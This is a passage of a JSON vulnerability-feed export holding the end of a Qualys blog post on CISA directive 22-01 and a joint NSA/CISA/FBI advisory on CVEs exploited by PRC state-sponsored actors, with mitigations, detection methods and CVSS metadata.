currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732','CVE-2020-1350','CVE-2020-1472','CVE-2021-26855','CVE-2021-26858','CVE-2021-27065','CVE-2020-0601','CVE-2021-26857','CVE-2021-22893','CVE-2020-8243','CVE-2021-22900','CVE-2021-22894','CVE-2020-8260','CVE-2021-22899','CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve that compliance. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-06-05T18:33:22", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity 
and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories & Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. 
PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess that PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor | CVE | Vulnerability Type \n---|---|--- \nApache Log4j | CVE-2021-44228 | Remote Code Execution \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution \nAtlassian | CVE-2022-26134 | Remote Code Execution \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload \nCitrix ADC | CVE-2019-19781 | Path Traversal \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution \nHikvision Webserver | CVE-2021-36260 | Command Injection \nSitecore XP | CVE-2021-42237 | Remote Code Execution \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing \nZOHO | CVE-2021-40539 | Remote Code Execution \nMicrosoft | CVE-2021-26857 | Remote Code Execution \nMicrosoft | CVE-2021-26858 | Remote Code Execution \nMicrosoft | CVE-2021-27065 | Remote Code Execution \nApache HTTP Server | CVE-2021-41773 | Path Traversal \n\nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. 
\n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. 
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to exploit an arbitrary file read vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * A hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate log files.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitLab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. 
\n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. 
\n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. 
A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n \n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. 
\n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. 
Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. 
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. 
\n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. 
\n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. 
If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-06T12:00:00", "type": "ics", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", 
